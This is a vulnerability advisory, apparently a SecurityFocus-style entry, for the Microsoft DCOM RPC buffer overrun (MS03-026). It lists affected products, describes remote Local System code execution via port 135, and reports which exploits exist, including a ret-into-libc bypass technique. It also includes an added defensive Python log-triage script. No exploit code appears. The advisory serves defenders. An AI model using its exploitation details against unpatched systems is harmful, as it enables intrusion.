- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Cisco Secure ACS for Windows NT 2.6.2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Cisco Secure ACS for Windows NT 2.6
Cisco Secure ACS for Windows NT 2.5
Cisco Secure ACS for Windows NT 2.4
Cisco Secure ACS for Windows NT 2.3
Cisco Secure ACS for Windows NT 2.1
Cisco Secure Access Control Server 3.2.1
Cisco Routed Wan Management
Cisco QoS Policy Manager
Cisco Personal Assistant
Cisco Networking Services for Active Directory
Cisco Network Registrar
Cisco Media Blender
Cisco Lan Management Solution
Cisco IP/VC 3540 Video Rate Matching Module
Cisco IP/VC 3540 Application Server
Cisco IP Telephony Environment Monitor
Cisco IP Contact Center Express
Cisco Internet Service Node
Cisco Intelligent Contact Manager
Cisco Emergency Responder
Cisco E-Mail Manager
Cisco Dynamic Content Adapter
Cisco DOCSIS CPE Configurator
Cisco Customer Response Application Server
Cisco Conference Connection
Cisco Collaboration Server
Cisco CiscoWorks VPN/Security Management Solution
Cisco Call Manager 3.3 (3)
Cisco Call Manager 3.3
Cisco Call Manager 3.2
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.1 (2)
Cisco Call Manager 3.1
Cisco Call Manager 3.0
Cisco Call Manager 2.0
Cisco Call Manager 1.0
Cisco Call Manager
Cisco Building BroadBand Service Manager Hotspot 1.0
Cisco Building Broadband Service Manager (BBSM) 5.2
Cisco Building Broadband Service Manager (BBSM) 5.1
Cisco Broadband Troubleshooter
Cisco Secure Access Control Server 3.2.2
Cisco Secure Access Control Server 3.2 (1.20)

- Unaffected versions

Cisco Secure Access Control Server 3.2.2
Cisco Secure Access Control Server 3.2 (1.20)

- Vulnerability discussion

A buffer overrun vulnerability has been reported in Microsoft Windows that can be exploited remotely via a DCOM RPC interface that listens on TCP/UDP port 135. The issue is due to insufficient bounds checking of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious instructions with Local System privileges on an affected system.

This issue may be exposed on other ports that the RPC Endpoint Mapper listens on, such as TCP ports 139, 135, 445 and 593. This has not been confirmed. Under some configurations the Endpoint Mapper may receive traffic via port 80.

** There have been unconfirmed reports that Windows 9x systems with certain software installed may also be vulnerable to this issue. Reportedly, Windows 98 systems with .NET software installed may be vulnerable according to scans using various DCOM RPC vulnerability scanning tools. Symantec has not confirmed this behaviour and it may in fact be due to false positives generated by the scanners.
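The discussion above names the transports on which the vulnerable DCOM activation path can be reached: TCP/UDP 135 primarily, and possibly the other ports the RPC Endpoint Mapper listens on (139, 445, 593, and in some configurations 80). A defender's first question is whether any of those ports are reachable from outside the trusted network, and whether one outside source is touching them on many hosts, which is what the worms named on this page did. The following is an added example, not part of this advisory or of any tool it references: a small Python log triage that parses constructed firewall log lines (the line format, the internal address ranges, and the sample addresses are all assumptions) and reports external sources that were allowed through to RPC/DCOM transport ports, plus sources that reached those ports on several distinct internal hosts. Port 80 is deliberately left out of the port set because the advisory only says it "may" carry Endpoint Mapper traffic under some configurations; add it if that applies to your environment.

```python
import ipaddress
import re
from collections import Counter, defaultdict

# Transport ports named in the advisory text as reaching the RPC Endpoint Mapper /
# DCOM activation path: 135 (primary), 139/445 (SMB named pipes), 593 (RPC over HTTP).
RPC_DCOM_PORTS = {135, 139, 445, 593}

# Assumed internal address space (assumption for this example, not from the advisory).
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]

# Constructed firewall log format (assumption):
#   <timestamp> ALLOW|DENY <proto> <src>:<sport> -> <dst>:<dport>
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<action>ALLOW|DENY)\s+(?P<proto>TCP|UDP)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample log: one external host sweeping port 135/445 across several
# internal hosts, one internal-to-internal RPC flow, one web flow, one RPC-over-HTTP flow.
SAMPLE_LOG = """\
2003-08-11T10:00:01 ALLOW TCP 203.0.113.5:4021 -> 192.168.1.10:135
2003-08-11T10:00:01 ALLOW TCP 203.0.113.5:4022 -> 192.168.1.11:135
2003-08-11T10:00:02 DENY  TCP 203.0.113.5:4023 -> 192.168.1.12:135
2003-08-11T10:00:02 ALLOW TCP 203.0.113.5:4024 -> 192.168.1.13:445
2003-08-11T10:00:03 ALLOW TCP 192.168.1.50:1033 -> 192.168.1.10:135
2003-08-11T10:00:04 ALLOW TCP 198.51.100.7:51000 -> 192.168.1.10:80
2003-08-11T10:00:05 ALLOW TCP 198.51.100.9:3301 -> 192.168.1.10:593
"""


def parse_line(line):
    """Parse one log line into a dict, or return None for lines in another format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def _allowed_external_rpc_flows(log_text):
    """Yield ALLOWed flows from an external source to an internal RPC/DCOM transport port.
    DENY lines are skipped: there the boundary control already held."""
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["action"] != "ALLOW":
            continue
        if (rec["dport"] in RPC_DCOM_PORTS
                and not is_internal(rec["src"]) and is_internal(rec["dst"])):
            yield rec


def external_rpc_exposure(log_text):
    """Map each external source to {dport: count} for RPC/DCOM ports it was allowed to reach."""
    hits = defaultdict(Counter)
    for rec in _allowed_external_rpc_flows(log_text):
        hits[rec["src"]][rec["dport"]] += 1
    return {src: dict(counts) for src, counts in hits.items()}


def likely_sweeps(log_text, min_targets=2):
    """External sources that reached RPC/DCOM ports on at least min_targets distinct
    internal hosts: the pattern of a scanner or a self-propagating worm."""
    targets = defaultdict(set)
    for rec in _allowed_external_rpc_flows(log_text):
        targets[rec["src"]].add(rec["dst"])
    return sorted(src for src, hosts in targets.items() if len(hosts) >= min_targets)


if __name__ == "__main__":
    for src, ports in external_rpc_exposure(SAMPLE_LOG).items():
        print(f"external source {src} allowed to RPC/DCOM ports: {ports}")
    print("sweep candidates:", likely_sweeps(SAMPLE_LOG))
```

On the constructed sample this reports 203.0.113.5 reaching port 135 twice and 445 once, 198.51.100.9 reaching 593 once, and flags only 203.0.113.5 as a sweep; the internal source and the port-80 flow are ignored. In practice the useful output is the first function's result while patching is in progress: any non-empty entry means an unpatched host on that list is reachable on a vulnerable transport, so the boundary rule, not just the patch, is the control to verify.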

- Exploit

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

August 02, 2003:

There is currently at least one autorooter-enabled IRC bot circulating which exploits this vulnerability. At this time, the IRC bot does not appear to be automated into a worm.

August 11, 2003:

An additional exploit (kaht2.zip) has been released.

November 7, 2003:

A new exploit designed to bypass various Windows memory protection schemes is available. The exploit works by using a 'ret-into-libc' chaining procedure, which copies a payload into a newly allocated page modified using undocumented API functions to be executable. This exploit, rpc!exec.c, is available below.

An exploit has been released as part of the MetaSploit Framework 2.0.

The following exploits are available:

- Solution

eEye has released a free scanning tool for administrators to detect systems vulnerable to this issue. Please check the references section for a link to download this utility.

** Several reports state that the RPC/DCOM service may still be vulnerable to a denial of service attack even if the Microsoft-supplied patch has been applied.

Microsoft has released patches to address this issue. Note that Windows NT 4.0 Workstation reached its end of life on June 30th, 2003. Because of this, Microsoft has not released a supported NT 4.0 Workstation patch. The Windows NT 4.0 Server patch may work on NT 4.0 Workstation; however, this has not been tested nor is it supported by Microsoft.

** CERT/CC reported an unrelated vulnerability in DCE implementations provided by various vendors that may be triggered by exploits or scanning tools associated with this issue. Please see BID 8371 for further details on the availability of fixes for affected implementations. It should be noted that this is a side-effect that may cause problems with DCE implementations, but does not affect Microsoft Windows itself.

Microsoft has released an update to their advisory stating that while the provided Windows 2000 patch will install on Windows 2000 SP2, it is unsupported. Microsoft recommends that users upgrade to a supported Service Pack. Further information can be found in MS03-026.

Cisco has released an advisory detailing the products affected by this vulnerability and making fix information available. Additional details are available in the referenced advisory.

Microsoft has released new fixes that supersede the original fixes for this issue. Administrators are advised to apply the new patches as they also address BID 8458, 8459, and 8460 in addition to this BID.

HP has made fixes available for OpenVMS.


Microsoft Windows NT Terminal Server 4.0 SP6

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows XP Professional

Cisco Conference Connection

Microsoft Windows NT Workstation 4.0 SP6a

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows 2000 Professional SP3

Microsoft Windows 2000 Professional SP2

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows XP Home SP1

Microsoft Windows XP 64-bit Edition

Cisco IP Contact Center Express

Microsoft Windows 2000 Professional SP4

Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP2

Cisco Call Manager 1.0

Cisco Call Manager 3.0

Cisco Call Manager 3.1 (3a)

Cisco Call Manager 3.1 (2)

Cisco Call Manager 3.3 (3)

Compaq OpenVMS 6.2 VAX

Compaq OpenVMS 6.2 -1H2 Alpha

Compaq OpenVMS 7.1 VAX

Compaq OpenVMS 7.1 Alpha

Compaq OpenVMS 7.2 Alpha

Compaq OpenVMS 7.2 VAX

Compaq OpenVMS 7.2 -1H1 Alpha

Compaq OpenVMS 7.2 -1H2 Alpha

Compaq OpenVMS 7.2 -2 Alpha

Compaq OpenVMS 7.3 Alpha

Compaq OpenVMS 7.3 -1 Alpha

- References
